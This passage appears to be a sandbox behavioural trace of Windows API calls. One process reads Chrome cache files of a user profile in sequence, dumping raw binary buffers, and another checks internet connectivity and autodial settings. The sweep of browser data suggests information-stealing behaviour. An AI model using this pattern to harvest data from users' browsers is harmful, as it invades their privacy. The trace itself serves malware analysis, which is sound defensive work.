\x84\xb6\x91\x04I\xa9\xf0\x07]\xd5sw\xff\x10"\xfa\x9f<i\F\x082\x83\xa3bi\x8a)\xb14\xc5p\x8eX\xa4\x0e?\x98\xc5\xc3"\xb3\x98z)b\x8a\xe5CNNd.\x18\x1b\x8cc\x8e\xc6\xa3\x16\x89\xa5\x1ebS\xa4RcS\x8f9\xe6\x82\x97z,\x88)\xa6\x8e\x94\xca\x13\xc3\x85Y\x9e\xcc\x05\x8f\x8f\x10,\xf5\xa8\x87q)\xb5<\x97Z\x9eT"\xb2\x8c\x94\xd0`\xf0x\x12\x8b\x9c\xa5^\x10 b\x99\xe3,s\x9c\xa4\xc82.\x95\xfaA\xe5S\xe6x\x86\xc5\xe1\xc3!\xc1\xd2 \xcf\xe0Q\x8fz,b\x89X\xe6\xa8%\xd4\x12\x1c\x17\x1f\xf5\x7fX\xe6\x88X\xeaQ\xf1\xb1T.\xa64\x86\x86\xd9\x8cp\xe1S.H\x08\x95\xc9\xc9\xb3\x04\xc7w\x10\x1f\xf58\x1b\xe6\xf0\xa8Gx\xa1\x96\x8a%\xd4\xf2a\x98\xd4\xa3^\x98E\xea\xf0\x10\x0f\x8f\x8a\xe5\x87\xa5"\x0b\x95 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,873 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,883 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00001b DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,893 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x02\xff\xbc\xbd\xe9v#G\x92.\xf8\x7f\x9e\x82\x88\xca\xa6"\x12N\x90LI}\xbb\x02\x0c\xe2\xa6r)\xa5J[Uf\x95\xa4\x02\x91:\xb1\x01\x08\x12\x1b\x0107\x02\xfd,\xf3\x1e\xf3c\xce\x99\x17\x9aW\x18\xfb\xcc\xdc=<\x16P\xd9}\xe7\-D,\x1e\xbe\x9a\x9b\xdbn\xa7\x8f;G\xd7\x7f\xbb\xcb\xd7\x1f\x8f\xde\x9d\xf7\xfe\xa3\xf7\xe4\xe8\xfa\x16w\xbdt9?\xda\x99\x9b\xe5zr:+\xd2|\xb1\xc9\x8f\x1e\x9f\xfe\x1f\xfe\xf8n\x91n\x8b\xe5\xc2\x8fU\x12\xdc\x9b\xbb\xa3\xbf\xf8qp\xff.^\x1f%\xd1\xcba<\x8a\xee\xf7\xfdu\xbe\xbd[/\x8eV\xbd<N\xa7~\xdc\xdb\xacf\xc5\xd6\xdf\x04\xca\xa9"
\xee\x93a:\x8a:g\xfb@%{[\xddwx\xa7\xb2\xe0\xbe\x18\xfbY\x14E\xc9\xf1q\xdc[,\xb3\xfc\xcd\xc7UN\xf7\xe7\xd2X\x1eyY\xbc\x8dO\xbcn\xda[\xe7\xabY\x9c\xe6\xfe+\xe5\x9d<:\xf7\x82\xdev\xf9\xfd FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,953 | 504 | NtReadFile |
Buffer => \xa4\xb3\xf3).!\xb4M\x19OG/8\x19K\x10 \xa2\x1f\xca\xab}\x0b\xad/d\xec-\xb2"\xe5\xec\xe7:\xb23\xc7\xaf\xa6\xe5\xcd\xf4l\xf8\x013R\xbae6\x834\xc1\x14P\xc0^\x9b\x1c\x91\x90{\xb2!nh\xcd\xd9\x1d<_\xcb\x91q\x9d\xbdQd\xb9\xf0\x9c e\x88\xe4\x94\x00\x16\x00\x08\xfd@\xe5\x9b'>\xdcEjgM@\x0c\x96\x1b\xa7\xda\xe2p\x1e\xf9\x85;\x83S\x9e\xd5\x99[t!\x13\xb8C\xb1\x91\xbc^\xc7C`\xf7 \x84\x83\xa2\xa6
/\xe9\xf3\xbe\x8a\xb9\xac;\xe1=VHV\xb3\xc9\xd2\xa9#\xde\xee\xfc\xaf+\xae\xec\x9dY\x10z+\xd07\x9ct\x8c\x92Q\x8foLW\x97A\x94\xf1\x84]\x8a\xd4\xe5\xc8'6:P\xd3\xcd\xf6\xd0\x04]u\xc2\x97\xa4\x16\x87\xe8\xd0O\xb2@ouV\x12\x13=\xdc.\x1bq\xdc\x9f\xb5\x1b;\xc2\xc3Z\x7f\xb9\xa4\x89\x9b\xa2\x91}\xc5:\xc3\xf1\x04\xfc\xb5\xcd,\xd3\xf0\x97v4q\x04\x98\xd2\xdd\xba FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,953 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:05,953 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00001c DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:05,973 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x0e\x8b\xa3S\x00\x03\xdc\xbdk\x97\x1c\xc7u \xf8y\xf7WT\xa7\xc4f&*\xaa\xba\x1a$(1\x0b\x89\x1a\x10h\x18\xb0\xf0\x1avS\xdcqw\xb1OvUVU\x02Y\x99\xa5\xcc\xacn\xb4\xbaK\xc7\x94,Kc\xd3\xb3\xf6\xec\xc8\x1ey\xe5\xb1GC\x8d$\xcf\x8e\xf5\xf0c!\xbf\xe6\x03w\xbfK\x9f\x08\x88_p\x96\x96\xed\xb1\xe4\xff\xb0\xf7\xdexdDfVu\x13\xf6\xf8\xf8\x0c\xcf!:+\xdeq#\xe2\xc6\xbd7\xee\xc3\x1e\xcd\xe3A\x1e&\xb1\x1d\xb0\xdc9\x91\xbf\x1a\xc7v\x00\xbf\x92\xd4>\xf4\xd3F\xeem\xb2\xb8\x1b{~:\x9eO\x838\xcfv\xf3~7o6\x1dY m\x84q#v\x82\xdd\xb4\xef\xc5\xf0O7
\xf2y\x1a7\x82\x85j\xf0\x00\x1b\x14\xc9W\xd3\xd4?n\xcf\xd2$O\xf2\xe3Y\xd0\xce\xa2p\x10\xb4\x07~\x14A\xa1\xa2\xca\x96\x18\x93\xe8$\xf6:,\xed\xa6^\xb0\x1b\xf7\xbb1\xf4\x1e\x8e\xec\xdc\xf3RG\xb4\x1a\x8b FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,043 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,043 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00001d DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,043 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00g\x18\x00\x13\x00\x00\x00\x00\xbb\xbc\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BASE\x00\x00\x01\xa8\x00\x00\x00>\x00\x00\x00P\x8as\x93\x7fFFTM\x00\x00\x01\xe8\x00\x00\x00\x1b\x00\x00\x00\x1cb\x07\xfd\xd4GDEF\x00\x00\x02\x04\x00\x00\x00\x1e\x00\x00\x00 \x01\x17\x00\x04GPOS\x00\x00\x02$\x00\x00
?\x00\x00\x18\x80k\xe0\x1f\x0bGSUB\x00\x00\x0cd\x00\x00\x00,\x00\x00\x000\xb8\xff\xb8\xfeOS/2\x00\x00\x0c\x90\x00\x00\x00W\x00\x00\x00`i\x7f\x9d cmap\x00\x00\x0c\xe8\x00\x00\x01\x81\x00\x00\x01\xd2\x9f\xbdB\x04cvt \x00\x00\x0el\x00\x00\x00<\x00\x00\x00<
W\x0crfpgm\x00\x00\x0e\xa8\x00\x00\x01\xb1\x00\x00\x02e\x0f\xb4/\xa7gasp\x00\x00\x10\\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x10glyf\x00\x00\x10d\x00\x00NQ FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,103 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,103 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00001e DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,103 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00f\x90\x00\x13\x00\x00\x00\x00\xb9\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BASE\x00\x00\x01\xa8\x00\x00\x00>\x00\x00\x00P\x8as\x93\x7fFFTM\x00\x00\x01\xe8\x00\x00\x00\x1b\x00\x00\x00\x1cb\x08\x00\xa9GDEF\x00\x00\x02\x04\x00\x00\x00\x1e\x00\x00\x00 \x01\x17\x00\x04GPOS\x00\x00\x02$\x00\x00
)\x00\x00\x18\xc0d\xf0\xf3zGSUB\x00\x00\x0cP\x00\x00\x00,\x00\x00\x000\xb8\xff\xb8\xfeOS/2\x00\x00\x0c|\x00\x00\x00X\x00\x00\x00`j\xa3\x9fxcmap\x00\x00\x0c\xd4\x00\x00\x01\x81\x00\x00\x01\xd2\x9f\xbdB\x04cvt \x00\x00\x0eX\x00\x00\x00$\x00\x00\x00$ \x06\x0b\x90fpgm\x00\x00\x0e|\x00\x00\x01\xb1\x00\x00\x02e\x0f\xb4/\xa7gasp\x00\x00\x100\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x10glyf\x00\x00\x108\x00\x00NN FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,163 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,163 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00001f DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,173 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00m<\x00\x13\x00\x00\x00\x00\xce\x98\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00BASE\x00\x00\x01\xa8\x00\x00\x00>\x00\x00\x00P\x8as\x93\x7fFFTM\x00\x00\x01\xe8\x00\x00\x00\x1b\x00\x00\x00\x1cb\x07\xfe\x8eGDEF\x00\x00\x02\x04\x00\x00\x00\x1e\x00\x00\x00 \x01\x17\x00\x04GPOS\x00\x00\x02$\x00\x00 -\x00\x00\x16\xc2G~\xf1$GSUB\x00\x00\x0bT\x00\x00\x00,\x00\x00\x000\xb8\xff\xb8\xfeOS/2\x00\x00\x0b\x80\x00\x00\x00\\x00\x00\x00`i\x80\x9d3cmap\x00\x00\x0b\xdc\x00\x00\x01\x81\x00\x00\x01\xd2\x9f\xbdB\x04cvt \x00\x00
`\x00\x00\x00N\x00\x00\x00N\x0b\xdd\x0eqfpgm\x00\x00
\xb0\x00\x00\x01\xb1\x00\x00\x02e\x0f\xb4/\xa7gasp\x00\x00\x0fd\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x10glyf\x00\x00\x0fl\x00\x00UF FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,233 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,253 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001bc FileInformation => p\x00\x00\x00\x00\x00\x00\x00\x00\x05\xa5\x89\xe0\x91\xcf\x01\x00\x05\xa5\x89\xe0\x91\xcf\x01\x00\x05\xa5\x89\xe0\x91\xcf\x01\x00\x05\xa5\x89\xe0\x91\xcf\x01(u\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\x00_\x000\x000\x000\x000\x002\x000\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\x00\x05\xa5\x89\xe0\x91\xcf\x010\x8c\xa6\x89\xe0\x91\xcf\x010\x8c\xa6\x89\xe0\x91\xcf\x010\x8c\xa6\x89\xe0\x91\xcf\x01\xb1q\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00f\x00_\x000\x000\x000\x000\x002\x001\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00@ZN\x90\xe0\x91\xcf\x01@ZN\x90\xe0\x91\xcf\x01@ZN\x90\xe0\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:44:06,253 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000020 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,273 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00u(\x00\x10\x00\x00\x00\x00\xf8\xf4\x00\x00\x00\x00\x00\x00s\xd8\x00\x00\x01P\x00\x00\x02{\x00\x00\x00\x00\x00\x00\x00\x00GPOS\x00\x00m\xc0\x00\x00\x06\x15\x00\x00\x0b\x12\x05\xea\x04FLTSH\x00\x00mP\x00\x00\x00m\x00\x00\x00\xfb\xe8\xebg\xb5OS/2\x00\x00\x01\xc4\x00\x00\x00X\x00\x00\x00`o\x95_\xdbVDMX\x00\x00hp\x00\x00\x03b\x00\x00\x05\xe0i\xdeqecmap\x00\x00\x02\x1c\x00\x00\x02\xdc\x00\x00\x05\xb2u\xbd\x07Zcvt \x00\x00k\xd4\x00\x00\x00\x1a\x00\x00\x00\x1a\x00\xd3\x06Hfpgm\x00\x00k\xf0\x00\x00\x01\x02\x00\x00\x01s\x06Y\x9c7glyf\x00\x00\x0c`\x00\x00\\x0e\x00\x00\xd2l~\x87\xa7\xcehead\x00\x00\x01\x8c\x00\x00\x006\x00\x00\x006\xf3*\xf3\xafhhea\x00\x00\x04\xf8\x00\x00\x00 \x00\x00\x00$\x06\xdb\x03\xd5hmtx\x00\x00\x05\x18\x00\x00\x02G FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,334 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:44:06,334 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:44:06,334 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x00172cd0 | |
| 07:44:06,334 | 1308 | OpenServiceW |
ServiceControlManager => 0x00172cd0 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x00172d28 | |
| 07:44:06,334 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:44:06,334 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:44:06,334 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:44:06,454 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,454 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000021 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,464 | 504 | NtReadFile |
Buffer => wOFF\x00\x01\x00\x00\x00\x00q\xb1\x00\x10\x00\x00\x00\x00\xe4\xf8\x00\x00\x00\x00\x00\x00pd\x00\x00\x01M\x00\x00\x02u\x00\x00\x00\x00\x00\x00\x00\x00GPOS\x00\x00jP\x00\x00\x06\x14\x00\x00\x0b\x12\x05\xe5\x04FLTSH\x00\x00i\xd8\x00\x00\x00v\x00\x00\x00\xfb\xe0>\xa16OS/2\x00\x00\x01\xc4\x00\x00\x00X\x00\x00\x00`o\xa5b\xfaVDMX\x00\x00d\xf8\x00\x00\x03b\x00\x00\x05\xe0i\xdeqecmap\x00\x00\x02\x1c\x00\x00\x02\xdc\x00\x00\x05\xb2u\xbd\x07Zcvt \x00\x00h\\x00\x00\x00\x1a\x00\x00\x00\x1a\x00\xfc\x06\x97fpgm\x00\x00hx\x00\x00\x01\x02\x00\x00\x01s\x06Y\x9c7glyf\x00\x00\x0cP\x00\x00X\xa5\x00\x00\xbe\x80\x80"\xea\xf0head\x00\x00\x01\x8c\x00\x00\x006\x00\x00\x006\xf37\xf3\xfdhhea\x00\x00\x04\xf8\x00\x00\x00 \x00\x00\x00$\x06\xfa\x03\xe6hmtx\x00\x00\x05\x18\x00\x00\x02: FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,534 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,534 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000023 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,554 | 504 | NtReadFile |
Buffer => <!doctype html>
<!--[if lt IE 7]> <html class="no-js ie6 lt-ie7 lt-ie8 lt-ie9"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 lt-ie8 lt-ie9"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 lt-ie9"> <![endif]- FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,684 | 504 | NtReadFile |
Buffer => <li class="tier-2 element-2" role="treeitem"><a href="http://pyfound.blogspot.com/" title="PSF Blog">PSF News</a></li>
<li class="tier-2 element-3" role="treeitem"><a href="http://planet.python.org/" title="Planet Python">Community News</a></l FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,694 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,714 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000025 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,734 | 504 | NtReadFile |
Buffer => GIF89a\x84\x02\xc7\x00\xf7\xff\x00\x01\x03\x02\x83\xaeP\xf9\xfa|\xfd\xf5\xcd\xfd\xf5\xd1\xfc\xf5\xc8\xe9\xec3\x98\xf1\xe1\xab\xc7i\xd6\xd1\xa5=\xaad\xfb\xf8\xa2\xfb\xf7\xad\xee\xe8D
\x01\xff\xf9\xf9\x89\xb2\xf4\xe8Xi\xb3\xf9\xfa\x84\xfc\xf6\xc3\xff\xff\xff\xfb\xf7\xb0o\xb4\xa4\xcd\xf7\xf0\xc0\xee\x8a\xf9\xfa\x81\xfc\xf6\xc0\xfc\xf6\xbc\x99\x99\x99\xcf\xcevLc]\xfb\xf7\xa9\xd4\xd4\x82\xfa\xf9\x91\xf9\xddS\xfa\xf9\x8d\xb0\xa1\x82\xfa\xf8\x99\xff\xff\x00\xfa\xf8\x9d\xd3\xdf\x93\xfe\xfc\xee\xfc\xf6\xb9\xbf\xbf\xf2\xfa\xf9\x94\x01f\xfe\xf4\xc46\xa4\xc1@\xfb\xc8g
a5\xd7ZJ\xf9\xbbk\xea.>\xff\x00\x00\xe0\xdf\x8a\xe9\xd6\x86\xf4\xe7\xb9\xee\xee\xee\xbc\xbagfff\xe3\xde\xaa\xc3\xb4\x83\xeb\xdc\x96\xbb\xd4\xac\xfd\xf7\xde\xfc`4\xcb\xd1H\xff\x95\x01j\x9aQ\x82\x8f\xb0\xf1\xe2\xaa\xc6\xd69]\x97L\xf7\xb7\x84\xff\xe9\x83\xe6\x8ag\xaa\xb0\xb5go\xe7\xcb\xc1\x8b\x86\xc7\xbb~\xa3U FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,814 | 504 | NtReadFile |
Buffer => \xc9\x93(M\x82\x123\xf0\xcf\x83\x940c\xca\xa4\xe8r\xa6\xcd\x9b8\xff\xd5\xcc\xc9\xb3\xe7E\x04HF\xbe\xf4I\xb4(CK\x7ft\x0e5\xca\xb4)\xc1<\x92\x96:\x9dJ\xb5\xaa\xd5\xabX\xb3j\xdd\xca\xb5\xab\xd7\xaf`\xc3\x8a\x1dK\xb6\xac\xd9\xb3h\xd3\xaa]\xcb\xb6\xad\xdb\xb7p\xe3\xcau\xcbbnX\x16\x81\xec~e!\xeb\x9f7\xbd\\xf9
\xdc\xd4\x01p\xd6\xba\x86\x03'\xe6Zb\xa0\xac@\xd8\x16W-!\x0b@^\xc9V\x1b\x83\xc0\xcc\xb9\xb3\xe7\xcf\xa0C\x8b\x1eM\xba\xb4\xe9\xd3\xa8S\xab^\xcd\xba\xb5\xeb\xd7\xb0c\xcb\x9eM\xbb\xb6\xed\xdb\xb8s\xeb\xde\xcd\xbb\xb7\xef\xdf\xc0\x83\x0b\x1fN\xbc\xb8\xf1\xe3\xc8\x93+_\xce\xbc\xb9\xf3\xe7\xd0\xa3K\x9fN\xbd\xba\xf5\xeb\xd8\xb3k\xdf\xce\xbd\xbb\xf7\xef\xe0\xc3\x8bU\x1fO\xbe\xbc\xf9\xf3\x0850\x847Ax\xfbw\x08C\xfdK\xd4>x}&\x05q,\xc9\xf5\x8fF}\xe0\x8d\x10\x84\xdfA\xff\xfdF
D FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,814 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,814 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_000028 DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,814 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x04\x00\xed\xbd\x07`\x1cI\x96%&/m\xca{\x7fJ\xf5J\xd7\xe0t\xa1\x08\x80`\x13$\xd8\x90@\x10\xec\xc1\x88\xcd\xe6\x92\xec\x1diG#)\xab*\x81\xcaeVe]f\x16@\xcc\xed\x9d\xbc\xf7\xde{\xef\xbd\xf7\xde{\xef\xbd\xf7\xba;\x9dN'\xf7\xdf\xff?\fd\x01l\xf6\xceJ\xda\xc9\x9e!\x80\xaa\xc8\x1f?~|\x1f?"\xfe\xc7\xbf\xf7\x1f|\xfc\xbb>\xfd\xf2\xe4\xcd\xef\xf3\xf24\x9d\xb7\x8b\xf2\xe81\xfeM\xdf-\xcae\xf3\xd9G\xf3\xb6]=\xba{\xf7\xea\xeaj|uo\\xd5\x17ww\x1f>|x\xf7\x1d\xda|DM\xf3lv\xf4x\x91\xb7\x19\xbd\xdb\xae\xb6\xf3_\xb4..?\xfb\xe8\xf7\xde\xfe\xeax\xfb\xa4Z\xac\xb2\xb6\x98\x94\xf9G\xe9\xb4Z\xb6\xf9\xb2\xfd\xec\xa3\xb3\xd3\xcf\xf2\xd9\x05}rW_\x9b\xce\xb3\xba\xc9\xe9\x9bu{\xbe}\xe0>_f\x8b\xfc\xb3\x8f.\x8b\xfcjU\xd5\xad\x07\xe1\xaa\x98\xb5\xf3\xcf FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,874 | 504 | NtReadFile |
Buffer => \xd2\x10{\x94
\x98Q\x1el\xff\x80\x12\xd4\xd9\xbd\xd9\x94\x16_("!\xc57!g\xdd\x8e\x91\x94\xca\xde\xce9\xf9\xf3\xe7S\x1a\xde~N\xcb0\xd9\xec\x9c\x94r\xbeK\xea\xf3AN\x96\x84\xf8\xea\x1b\x1b\xe3]\xb8\x0c\x9d\xf9\x0b\&\xc2,\x1ci\xb6Z5\xcc\xc7\x17\xd9"2X\xe8@R\xe54\xba|B\xde\xeeCr`\x0f\x1e>\xa4)\xbb\x97g\x93O\xf7\x1e>\xd8\xcb\xdd\x84\xd2\xda
\x05f\xf71\xdd\x94\x88\x87WArM\xde}>#=z/\x9f=\x98\xee\x91\xe2\xfd\x1a\x83
9\xd8\xa4|\x86\x1d{\x9a\x00\xfcI\x03\xc5\x98I\x7f;\xb5D\x00Vk\xe2\xfd\xd4@\xe9
\xf9!\x05{{\xd3=2\x87\xf7\xc8]\xda?\xdf\xa1\x9c\x1e\x89'9\xc5\xd9\x03Zf\xd8%\x07\xca%\xc0>\xfdtv?\xcbviMe\xbaO\xda\xfd!\xb9_\xfc\xe7\xc3\x83lgz@~4EG_k\xc8\x03\xf3+\xd9\x88\xbbW\xab\x83\xbb\x98\xb9\xbb\x8b\x9cdx
FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,884 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,884 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00002e DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,894 | 504 | NtReadFile |
Buffer => \x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x03\x02\x00\x00\x00\xff\xff\xed\xbdi{\x1b7\xb2(\xfc}~\x05\xd5\x93\x91\xd8fK\xea\xe6\xbe\xb8\xad\xab\xd8\xca\x1c\x9f\xe3\xd8\xbe^\x92\xf7\\x8a\xf1\xd3\xec\xc5\xe6D"5$\xe5E\xa2\xe6\xb7\xdfZ\xb0\xf6BI\x8e\x93\xc9}\x9f3\x8b\xc5\x06
\x85B\xa1\x00\x14
\x85\xc2\xe1\x83\xbf<\xa8=^\|Y\xce\xde\x7fX\xd7\x9a\xbe?\xd8o\xfaA\xab\xf6s:]/\xd3y\xb2\xaa=\x9d\xc7\x07\xb5\xe3\xb3\xb3\xda+\x04Y\xd5^\xa5\xabt\xf91M\x0e\xa0\xe4\xcf'\xdf\xbfyu\xf2\xfc\xc9\xeb\xda\xcbW/^\xbezz\xf2\xe6\xf8\xd5\x7f\x1f>~\xf1\xfc\x87\xa7ON\x9e\xbfyz\xfc\xec\xa0\xf6v\x95\xd6f\xab\xda\xear\xfa\x8f4^\xd7\xd6\x8b\xda\xd9,N\xe7\x90\xbaN\x97\xe7+@\xf3\x97\x07\x87\x7f\xf9\xcb\xcfo^\\xacg\xe7\xb3\xab\xf4\xe0*\xe9\xf6\xb20\xbb\x9c\xc7\xeb\xd9b^\xbf
\xa2f\xcb\xbd\xfe\x18-kW\xadf\x12 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,944 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:06,954 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Documents and Settings\TDW\Local Settings\Application Data\Google\Chrome\User Data\Default\Cache\f_00002f DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:06,964 | 504 | NtReadFile |
Buffer => \xff\xd8\xff\xe1\x00\x18Exif\x00\x00II*\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xec\x00\x11Ducky\x00\x01\x00\x04\x00\x00\x00d\x00\x00\xff\xe1\x03\xc0http://ns.adobe.com/xap/1.0/\x00<?xpacket begin="\xef\xbb\xbf" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xml FileHandle => 0x000001c0 |
SUCCESS | 0x00000000 | |
| 07:44:07,025 | 504 | NtReadFile |
Buffer => FileHandle => 0x000001c0 |
FAILURE | 3221225489 | |
| 07:44:07,025 | 504 | NtCreateFile |
